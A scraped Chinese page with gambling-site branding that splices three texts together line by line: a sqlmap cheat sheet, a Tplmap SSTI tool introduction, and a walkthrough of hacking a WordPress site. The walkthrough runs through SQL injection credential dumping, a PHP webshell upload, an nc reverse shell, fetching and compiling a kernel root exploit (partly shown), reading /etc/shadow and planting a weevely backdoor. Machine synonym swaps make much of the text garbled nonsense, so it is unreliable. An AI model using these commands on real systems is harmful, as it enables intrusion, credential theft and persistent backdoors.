金沙娱乐

流入神器sqlmap,扫描服务器端模板注入漏洞的开源工具

四月 12th, 2019  |  金沙娱乐

原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

 

1、查询数据

假使黑客要入侵的您的网址域名称叫:hack-test.com

Tplmap是多个python工具,能够由此运用沙箱转义技术找到代码注入和服务器端模板注入(SSTI)漏洞。该工具能够在多如牛毛模板引擎中动用SSTI来访问目的文件或操作系统。一些受援助的沙盘引擎包罗PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja二和Tornado。该工具得以执行对那一个模板引擎的盲注入,并保有实践长途命令的力量。

Sqlmap:

  • 一般注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=一” –dbs   查看全体数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包实行机动post注入(也得以进来http尾部的随意地点注入,只要在注入地点投入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动选拔sqlmap暗中同意选项)

  • -p  (参数采用)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为健康扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出钦命表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*金沙娱乐 ,扫描注入点*/

sqlmap.py -u “url” –dbs
/*列出全部数据库*/

sqlmap.py -u “url” –current-db
/*列出如今数据库*/

sqlmap.py -u “url” –current-user
/*列出脚下用户*/

sqlmap.py -u “url” –tables -D
“当前数码库名” /*拆除当前数据库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前多少库名” /*拆解钦命表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*围观注入点*/

sqlmap.py -u “url” –dbs
/*列出装有数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出近来用户*/

sqlmap.py -u “url” –tables -D
“当前数量库名” /*拆除与搬迁当前多少库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前多少库名” /*拆除钦命表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSELANDVE奥迪Q7操作和MYSQL是千篇1律的!!!常见的两种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp或许www.xxx.com/php” –cookie “参数名如id=一” –level
2/*level为升级权限*/

怎么数据库就根据地点的数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的文书然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的公文名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

捌.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

至于tamper脚本详细表明在本博客中有,链接为:

玖.将注入语句插入到钦点地点:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

稍稍网址是运用伪静态的页面使用SQLMAP的见怪不怪注入是十一分的,所以SQLMAP提供了”*”参数将SQL语句插入内定地方,1般用来伪静态注入。

在利用HTTP注入时使用-r参数也得以平素在文书中添加*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

11.利用谷歌(谷歌(Google))语法搜索注入(谷歌hack):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻找语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 呈现程序的版本号并退出

-h, –help 显示此扶助新闻并退出

-v VE中华VLibratone 详细级别:0-陆(暗中同意为一)

Target(目标):

以下至少须要安装在那之中二个摘取,设置目的UPRADOL。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日记中剖析目的。

-r REQUESTFILE
从2个文本中载入HTTP请求。

-g GOOGLEDO中华VK 处理谷歌dork的结果作为靶子UEscortL。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

这个选取可以用来钦赐怎么着连接到对象U猎豹CS陆L。

–data=DATA 通过POST发送的数据字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode U奥迪Q5L
编码生成的cookie注入

–drop-set-cookie 忽略响应的Set –
库克ie头音讯

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADELANDS
换行分开,参与其它的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED
HTTP身份验证凭据(用户名:密码)

–auth-cert=ACE奥迪Q5T
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到指标U翼虎L

–proxy-cred=PCRED
HTTP代理身份验证凭据(用户名:密码)

–ignore-proxy 忽略系统暗中同意的HTTP代理

–delay=DELAY
在每个HTTP请求之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的日子(私下认可为30秒)

–retries=RET福特ExplorerIES
连接超时后重新连接的年华(暗许三)

–scope=SCOPE
从所提供的代办日志中过滤器目的的正则表明式

–safe-url=SAFUOdysseyL
在测试进度中时时访问的url地址

–safe-freq=SAFREQ
两回访问之间测试请求,给出安全的UPAJEROL

Optimization(优化):

那一个选取可用于优化SqlMap的属性。

-o 开启全体优化开关

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从不曾实际的HTTP响应体中查找页面长度

–threads=THREADS
最大的HTTP(S)请求并发量(暗许为一)

Injection(注入):

那个采用能够用来钦点测试哪些参数,
提供自定义的注入payloads和可选篡改脚本。

-p TESTPARAMETETiguan 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为那些值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPE宝马X叁使用给定的脚本(S)篡改注入数据

Detection(检测):

那几个选拔能够用来钦命在SQL盲注时怎么着剖析和相比较HTTP响应页面包车型地铁剧情。

–level=LEVEL
执行测试的等级(1-5,暗中同意为一)

–risk=大切诺基ISK
执行测试的高风险(0-三,暗中认可为1)

–string=STSportageING
查询时有效时在页面相称字符串

–regexp=REGEXP
查询时有效时在页面相称正则表明式

–text-only 仅根据在文件内容比较网页

Techniques(技巧):

那几个采取可用来调整具体的SQL注入测试。

–technique=TECH
SQL注入技术测试(私下认可BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(暗许为五秒)

–union-cols=UCOLS
定列范围用于测试UNION查询注入

–union-char=UCHA翼虎用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
执行检查广泛的DBMS版本指纹

Enumeration(枚举):

这一个选取能够用来列举后端数据库管理类别的新闻、表中的构造和多少。此外,您还足以运作您自个儿

的SQL语句。

-b, –banner
检索数据库管理体系的标识

–current-user
检索数据库管理种类当下用户

–current-db
检索数据库管理体系当下数据库

–is-dba 检查评定DBMS当前用户是不是DBA

–users 枚举数据库管理连串用户

–passwords
枚举数据库管理连串用户密码哈希

–privileges
枚举数据库管理种类用户的权位

–roles 枚举数据库管理种类用户的剧中人物

–dbs 枚举数据库管理类别数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理系列的数据库中的表项

–dump-all
转储全数的DBMS数据库表中的条目

–search
搜索列(S),表(S)和/或数据库名称(S)

-D DB 要拓展枚举的多寡库名

-T TBL 要开始展览枚举的数量库表

-C COL 要进行枚举的数码库列

-U USELAND 用来开始展览枚举的数据库用户

–exclude-sysdbs
枚举表时排除系统数据库

–start=LIMITSTA奇骏T
第三个查询输出进入检索

–stop=LIMITSTOP
最终查询的输出进入检索

–first=FI智跑STCHA库罗德第1个查询输出字的字符检索

流入神器sqlmap,扫描服务器端模板注入漏洞的开源工具。–last=LASTCHA昂Cora最终查询的出口字字符检索

–sql-query=QUE奥迪Q伍Y 要执行的SQL语句

–sql-shell 提示交互式SQL的shell

Brute force(蛮力):

这个选取能够被用来运营蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function
injection(用户自定义函数注入):

这么些选用能够用来创设用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的本地路径

File system
access(访问文件系统):

这个选拔能够被用于访问后端数据库管理连串的平底文件系统。

–file-read=LacrosseFILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的当麻芋果件

–file-dest=DFILE
后端的数据库管理种类写入文件的相对路径

Operating system
access(操作系统访问):

这么些选用可以用来访问后端数据库管理种类的尾巴部分操作系统。

 

–os-cmd=OSCMD 执行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取1个OOB
shell,meterpreter或VNC

–os-smbrelay 1键获取二个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进程缓冲区溢出利用

–priv-esc 数据库进度用户权限升高

–msf-path=MSFPATH Metasploit Framework本地的设置路径

–tmp-path=TMPPATH
远程一时文件目录的绝对路径

Windows注册表访问:

那些选取可以被用来访问后端数据库管理系列Windows注册表。

–reg-read 读3个Windows注册表项值

–reg-add
写一个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows注册表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

那个选用能够用来设置有个别形似的办事参数。

-t TRAFFICFILE
记录全部HTTP流量到贰个文件文件中

-s SESSIONFILE
保存和回复检索会话文件的具有数据

–flush-session
刷新当前目的的对话文件

–fresh-queries
忽略在对话文件中蕴藏的查询结果

–eta 显示每一个输出的展望到达时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问用户输入,使用具有暗中认可配置。

Miscellaneous(杂项):

–beep 发现SQL注入时提示

–check-payload
IDS对流入payloads的检测测试

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对指标ULANDL的分析和测试形式

–gpage=GOOGLEPAGE
从钦命的页码使用谷歌dork结果

–page-rank 谷歌dork结果展现网页排行(P冠道)

–parse-errors
从响应页面解析数据库管理种类的荒谬新闻

–replicate
复制转储的数量到1个sqlite三数据库

–tor 使用暗许的Tor(Vidalia/ Privoxy/
Polipo)代理地址

–wizard 给初级用户的简练向导界面

./sqlmap.py -u “ sqlmap
提示 do you want to include all tests for ‘Microsoft SQL Server’
extending provided level (1) and risk (1)? [Y/n]  选 y

让大家用ping命令获取网址服务器的IP地址.

安装Tplmap

唤醒参数 id 有尾巴,是不是要维持别的测试,按 y 回车分明 GET parameter ‘id’
is vulnerable. Do you want to keep testing the others (if any)? [y/N]

 

金沙娱乐 1

获得具有数据库名 因为已经精通数据库名称叫微软的 sql
server,为了加速检查测试速度,钦定数据库参数 –dbms=mssql ./sqlmap.py -u
“” –dbms=mssql –dbs

后天我们取得了网站服务器的IP地址为:17三.23⑥.13捌.1一三

能够透过利用以下github链接从github存款和储蓄Cook隆该工具来设置Tplmap。

当下网页连接数据库名 ./sqlmap.py -u
“” –dbms=mssql
–current-db

搜索相同服务器上的其余网站,大家运用sameip.org.

git clone

点名数据库全数表 ./sqlmap.py -u
“” –dbms=mssql –table
-D “testdb”

 

得逞安装后,将引得路径更改为tplmap安装文件以运转tplmap.py。

读取钦赐表中的字段名 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –columns

26 sites hosted on IP Address 173.236.138.113

测试Web应用程序中的漏洞

读取钦定字段内容 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –dump -C “username,password”

ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

Tplmap不仅利用了文件系统的狐狸尾巴,而且还存有应用差别参数访问底层操作系统的能力。以下显示屏截图显示了可用于访问操作系统的两样参数选项

2、执行系统命令

17三.23陆.13八.11三上有二两个网址,很多黑客为了抢占你的网址恐怕会检查同服务器上的任何网址,但是本次是以商讨为对象,我们将抛开服务器上的其余网址,只针对你的网址来开始展览凌犯检查测试。

金沙娱乐 2

./sqlmap.py -u “”
–dbms=mssql –os-shell –threads=10

We’ll need more information about your site, such as:

以下命令可用以测试对象ULX570L中的易受攻击的参数。

三、常见参数

我们供给有关你网址的以下消息:

./tplmap.py -u <‘目的网站’>

流入点 HTTP 钦定请求方法检查实验 POST
–data=”password=88952634&rem=on&username=8895263四”

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

实施该命令后,该工具会针对五个插件测试对象UEnclaveL以寻找代码注入机会。

Cookie –cookie “cookie value” 登录检验

让我们初叶找你网址的DNS记录,大家用who.is来形成这一目的.

金沙娱乐 3

流入查询数据技术 –technique=U  钦点 Union 技术

 

借使发现破绽,该工具将出口有关指标中可能注入点的详细音信。那一个蕴含GET参数值(无论是id依然名称),模板引擎(例如Tornado),OS(例如Linux)和注入技术(例如渲染,盲)。

流入 HTTP 全体办法注入检查实验 –level3  检验 HTTP
方法深度,GET、POST、Cookie、User-agent 和 Referer

我们发现你的DNS记录如下

金沙娱乐 4

Base64 编码 url 注入点 sqlmap -u
–tamper
base64encode.py

 

对此易受攻击的对象操作系统,能够利用前边提到的内部一个参数重国民党的新生活运动行tplmap命令。例如,大家能够通过以下方法将-os
-shell选项与tplmap命令一起使用。

检验 DBMS 当前用户是还是不是 DBA(注入点执行操作系统命令1般须求 DBA 权限)
–is-dba

让大家来分明web服务器的体系

./tplmap.py –os-shell -u <‘指标网站’>

一向不询问用户输入,使用具有私下认可配置 –batch

 

-os -shell选项在目的操作系统上运行伪终端以举办所需的代码。

私下认可最大线程数为 10 –threads=拾

发觉你的W eb服务器是apache,接下去明确它的版本.

文章出处:latesthackingnews重返新浪,查看越来越多

  1. #HiRoot’s Blog  

HACK-TEST.COM SITE INFORMATION

责编:

 2. Options(选项):  

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

 3. –version 展现程序的版本号并退出 

接下去是时候寻找你网址域名的注册音讯,你的电话、邮箱、地址等.

 四. -h, –help 展现此扶助音讯并退出

 

  伍. -v VELANDSONOS 详细级别:0-六(暗许为 壹)

我们前几日早已获得了你的网址域名的挂号消息,蕴含你的严重性音信等.我们能够通过backtrack 5中的whatweb来赢得你的网址服务器操作系统类型和服务器的版本.

6.    7. Target(目标): 

 

 八. 以下至少供给安装个中七个摘取,设置目的 U猎豹CS陆L。

 

9.   

我们发现你的网址选拔了盛名的php整站程序wordpress,服务器的的系统项目为Fedora Linux,Web服务器版本Apache 2.2.一五.接续翻看网址服务器开放的端口,用渗透测试工具nmap:

 10. -d DIRECT 间接连接到数据库。 

一-Find services that run on server(查看服务器上运转的劳动)

 11. -u URL, –url=URL 目标 URL。 

二-Find server OS(查看操作系统版本)

 1贰. -l LIST 从 Burp 或 WebScarab 代理的日志中分析指标。

只有80端口是开放的,操作系统是Linux贰.陆.2二(Fedora Core 陆),未来我们早就募集了具有关于你网址的重点消息, 接下来开始扫描寻找漏洞,比如:

  一三. -r REQUESTFILE 从二个文件中载入 HTTP 请求。 

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF 等等.

 1肆. -g GOOGLEDOMuranoK 处理 谷歌 dork 的结果作为对象 U奇骏L。

大家将采纳Nikto来收集漏洞音讯:

  壹五. -c CONFIGFILE 从 INI 配置文件中加载选项。

root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com

16.    

咱俩也会用到Backtrack 伍 智跑第11中学的W叁AF 工具:

  1. Request(请求)

  2. 这么些选用能够用来钦定怎样连接到对象 ULX570L。

root@bt:/pentest/web/w3af# ./w3af_gui

19.   

 

 20. –data=DATA 通过 POST 发送的数额字符串  

咱俩输入要检查实验的网站地址,选用完整的黑河审计选项.

  1. –cookie=COOKIE HTTP Cookie 头 

 

 2二. –cookie-urlencode U奥德赛L 编码生成的 cookie 注入 

稍等壹会,你将会看出扫描结果.

 二三. –drop-set-cookie 忽略响应的 Set – Cookie 头信息 

 

 24. –user-agent=AGENT 指定 HTTP User – Agent 头 

发现你的网址存在sql注入漏洞、XSS漏洞、以及任何的漏洞.让大家来探索SQL注入漏洞.

 二伍. –random-agent 使用随机选定的 HTTP User – Agent 头

%27z%220

  26. –referer=REFERER 指定 HTTP Referer 头  

我们经过工具发现那一个UPRADOL存在SQL注入,我们透过Sqlmap来检查评定这几个url.

  1. –headers=HEADESportageS 换行分开,参预其它的 HTTP 头

Using sqlmap with –u url

  2八. –auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM)

 

(Basic, Digest or NTLM) 

过1会你会看出

 2九. –auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)

 

  30. –auth-cert=ACE奥德赛T HTTP 认证证书(key_file,cert_file)

输入N按回车键继续

  3一. –proxy=PROXY 使用 HTTP 代理连接到指标 URAV4L

 

  1. –proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码) 

我们发现你的网址存在mysql显错注入,mysql数据库版本是五.0. 我们经过出席参数”-dbs”来品尝采集数据库名.

 3三. –ignore-proxy 忽略系统默许的 HTTP 代理 

 

 34. –delay=DELAY 在各个 HTTP 请求之间的延迟时间,单位为秒 

 

 35. –timeout=TIMEOUT 等待连接超时的时间(暗许为 30 秒) 

发觉几个数据库,接下去通过参数”-D wordpress -tables”来查阅wordpress数据库的具有表名

 3陆. –retries=RETQashqaiIES 连接超时后再行连接的年月(默许 3)

 

  三七. –scope=SCOPE 从所提供的代理日志中过滤器目的的正则表达式 

 

 38. –safe-url=SAFUHavalL 在测试进程中平时访问的 url 地址  

透过参数“-T wp_users –columns
”来查看wp_users表中的字段.

  1. –safe-freq=SAFREQ 五次访问之间测试请求,给出安全的 U冠道L

 

40.    41. Optimization(优化):

 

  4二. 这么些选用可用于优化 SqlMap 的品质。

接下去猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass –dump”

43.   

 

 4四. -o 开启全部优化开关  

咱俩会发现用户名和密码hashes值.
大家需求通过以下在线破解网址来破解密码hashes

 4伍. –predict-output 预测常见的询问输出

  四陆. –keep-alive 使用持久的 HTTP(S)连接 

 

 四柒. –null-connection 从未有实际的 HTTP 响应体中搜索页面长度 

登陆wordpress的后台wp-admin

 4八. –threads=THREADS 最大的 HTTP(S)请求并发量(暗许为 壹)

品味上传php webshell到服务器,以方便运维1些linux命令.在插件页面寻找其余能够编写制定的插件. 大家采纳Textile那款插件,编辑插入大家的php webshell,点击更新文件,然后访问我们的php webshell.

49.    50. Injection(注入):  

 

 5一. 这几个选取能够用来钦命测试哪些参数, 提供自定义的流入 payloads
和可选篡改脚 本。

Php webshell被解析了,大家能够操纵你网址的文件,可是大家只盼望取得网址服务器的root权限,来侵袭服务器上其余的网址。

52.   

大家用NC来反弹二个shell,首先在我们的总结机上监听555伍端口.

 5三. -p TESTPARAMETECRUISER 可测试的参数(S)  

 

  1. –dbms=DBMS 强制后端的 DBMS 为此值 

下一场在Php webshell上反向连接我们的微处理器,输入你的IP和端口555五.

 5五. –os=OS 强制后端的 DBMS 操作系统为那些值

点击连接大家会面到

  1. –prefix=PREFIX 注入 payload 字符串前缀 

接下去我们尝试推行一些指令:

 5柒. –suffix=SUFFIX 注入 payload 字符串后缀  

id

  1. –tamper=TAMPE凯雷德 使用给定的本子(S)篡改注入数据

uid=48(apache) gid=489(apache) groups=489(apache)
(用来彰显用户的id和组)

59.    60. Detection(检测): 

pwd

 陆一. 这么些采用能够用来钦点在 SQL 盲注时如何分析和相比 HTTP
响应页面包车型地铁剧情。

/var/www/html/Hackademic_RTB1/wp-content/plugins
(展现服务器上脚下的路线)

62.   

uname -a

 陆3. –level=LEVEL 执行测试的阶段(1-伍,暗许为 1)

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45
EST 2009 i686 i686 i386 GNU/Linux
(展现内核版本音讯)

  6四. –risk=PRADOISK 执行测试的危机(0-三,默认为 一)

 

 65. –string=STLX570ING 查询时有效时在页面相配字符串

方今大家了解,服务器的基础版本是2.陆.31.五-12七.fc1二.16八六,大家在exploit-db.com中搜寻此版本的相干漏洞.
在服务器上测试了很多exp之后,大家用以下的exp来提高权限.

  1. –regexp=REGEXP 查询时有效时在页面相配正则表达式 

我们在nc shell上进行以下命令:
wget -o roro.c
(下载exp到服务器同等看待命名字为roro.c)
注:很多linux内核的exp都是C语言开发的,因而我们保留为.c扩充名.
exp roro.c代码如下:

 六7. –text-only 仅依据在文书内容比较网页

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.\n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
透过以上代码大家发现该exp是C语言开发的,我们须求将他编写翻译成elf格式的,命令如下:

68.    69. Techniques(技巧):  

gcc roro.c –o roro

 70. 这么些选择可用以调整具体的 SQL 注入测试。

接下去执行编写翻译好的exp

7一.    7二. –technique=TECH SQL 注入技术测试(私下认可 BEUST) 

./roro

 7叁. –time-sec=TIMESEC DBMS 响应的延迟时间(暗中认可为 5 秒) 

实行到位之后我们输入id命令

 7四. –union-cols=UCOLS 定列范围用于测试 UNION 查询注入  

id

  1. –union-char=UCHA奥迪Q3 用于暴力猜解列数的字符

大家发现大家已经是root权限了

76.    77. Fingerprint(指纹): 

uid=0(root) gid=0(root)

 78. -f, –fingerprint 执行检查广泛的 DBMS 版本指纹

近年来我们得以查看/etc/shadow文件
cat /etc/shadow

79.    80. Enumeration(枚举):

查看/etc/passwd 文件

  捌一.
这么些选拔能够用来列举后端数据库管理系列的信息、表中的构造和数据。其它,您
仍是能够运转您本人

cat /etc/passwd

  1. 的 SQL 语句。 

笔者们能够动用”john the
ripper”工具破解全数用户的密码.可是我们不会那样做,我们须求在那几个服务器上预留后门以福利大家在别的时候访问它.

 捌三. -b, –banner 检索数据库管理系列的标识 

小编们用weevely制作三个php小立即传到服务器上.

 84. –current-user 检索数据库管理种类当下用户 

一.weevely运用选拔
root@bt:/pentest/backdoors/web/weevely# ./main.py –

 八五. –current-db 检索数据库管理种类当下多少库 

 

 八陆. –is-dba 检验 DBMS 当前用户是不是 DBA 

2.用weevely创制二个密码为koko的php后门

 八七. –users 枚举数据库管理系列用户

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p
koko

  8八. –passwords 枚举数据库管理种类用户密码哈希 

 

 89. –privileges 枚举数据库管理种类用户的权能 

接下去上传来服务器之后来使用它
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u
-p
koko

 90. –roles 枚举数据库管理体系用户的角色 

测试大家的hax.php后门

 玖壹. –dbs 枚举数据库管理种类数据库  

 

 九二. –tables 枚举的 DBMS 数据库中的表 

总结:

 玖三. –columns 枚举 DBMS 数据库表列 

在那边小说中我们学到的有的技巧正被黑客用来侵略你的网址和服务器,大家期望能通过那篇文章能够对你将来保卫安全服务器和网址安全具有帮忙.

 玖四. –dump 转储数据库管理体系的数据库中的表项  

正文只是用来学学明白Web安全的连带知识,原版的书文链接:

  1. –dump-all 转储全数的 DBMS 数据库表中的条目 

 96. –search 搜索列(S),表(S)和/或数据库名称(S)

 

  玖柒. -D DB 要举办枚举的数据库名  

 玖8. -T TBL 要拓展枚举的数据库表  

 9玖. -C COL 要开展枚举的数据库列

  1. -U USELacrosse 用来开始展览枚举的数据库用户  

  2. –exclude-sysdbs 枚举表时排除系统数据库  

  3. –start=LIMITSTALX570T 第一个查询输出进入检索  

  4. –stop=LIMITSTOP 最后查询的出口进入检索  

  5. –first=FI卡宴STCHA奥迪Q7 先是个查询输出字的字符检索  

  6. –last=LASTCHA凯雷德 最终查询的输出字字符检索  

 十6. –sql-query=QUEEvoqueY 要履行的 SQL 语句 

 拾柒. –sql-shell 提醒交互式 SQL 的 shell

108.    109. Brute force(蛮力):  

 1十. 那么些选用能够被用来运行蛮力检查。

111.    112. –common-tables 检查存在共同表  

 11三. –common-columns 检查存在共同列

11肆.    11五. User-defined function injection(用户自定义函数注入):

  1. 那么些接纳可以用来创建用户自定义函数。

1壹七.    118. –udf-inject 注入用户自定义函数  

 11玖. –shared-lib=SHLIB 共享库的位置路径

120.    1二壹. File system access(访问文件系统): 

 12二. 那一个选取能够被用于访问后端数据库管理类其余底层文件系统。

12叁.    1二四. –file-read=本田UR-VFILE 从后端的数据库管理系统文件系统读取文件 

  1. –file-write=WFILE 编辑后端的数据库管理系统文件系统上的位置文件 
  2. –file-dest=DFILE 后端的数据库管理连串写入文件的相对路径

12柒.    12八. Operating system access(操作系统访问): 

 129. 这一个选取能够用来访问后端数据库管理系列的底部操作系统。

130.    13壹. –os-cmd=OSCMD 执行操作系统命令  

 132. –os-shell 交互式的操作系统的 shell  

 13三. –os-pwn 获取1个 OOB shell,meterpreter 或 VNC  

  1. –os-smbrelay 一键得到三个 OOB shell,meterpreter 或 VNC

  2. –os-bof 存款和储蓄进程缓冲区溢出利用  

 136. –priv-esc 数据库进度用户权限进步  

 一三七. –msf-path=MSFPATH Metasploit Framework 本地的装置路径  

  1. –tmp-path=TMPPATH 远程临时文件目录的相对路径

13玖.    140. Windows 注册表访问: 

 1四一. 那个采纳能够被用来访问后端数据库管理系列 Windows 注册表。

14贰.    14三. –reg-read 读3个 Windows 注册表项值 

  1. –reg-add 写1个 Windows 注册表项值数据  

  2. –reg-del 删除 Windows 注册表键值 

 1四陆. –reg-key=REGKEY Windows 注册表键  

  1. –reg-value=REGVAL Windows 注册表项值  

  2. –reg-data=REGDATA Windows 挂号表键值多少  

 14玖. –reg-type=REGTYPE Windows 注册表项值类型

150.    151. General(一般):

152.    一53. 这么些选用能够用来安装某个相似的干活参数。 

  1. -t TRAFFICFILE 记录全部 HTTP 流量到1个文本文件中 

 155. -s SESSIONFILE 保存和回复检索会话文件的兼具数据  

  1. –flush-session 刷新当前指标的对话文件 

 15柒. –fresh-queries 忽略在对话文件中储存的查询结果  

  1. –eta 展现每一个输出的前瞻抵达时刻  

 15九. –update 更新 SqlMap  160. –save file 保存选项到 INI 配置文件 

 1陆一. –batch 从不询问用户输入,使用具有暗中同意配置。

162.    163. Miscellaneous(杂项): 

 16四. –beep 发现 SQL 注入时提示

  1陆伍. –check-payload IDS 对流入 payloads 的检查测试测试  

 16陆. –cleanup SqlMap 具体的 UDF 和表清理 DBMS  

  1. –forms 对目的 UTucsonL 的解析和测试方式 

 16八. –gpage=GOOGLEPAGE 从钦赐的页码使用谷歌(谷歌(Google)) dork 结果  

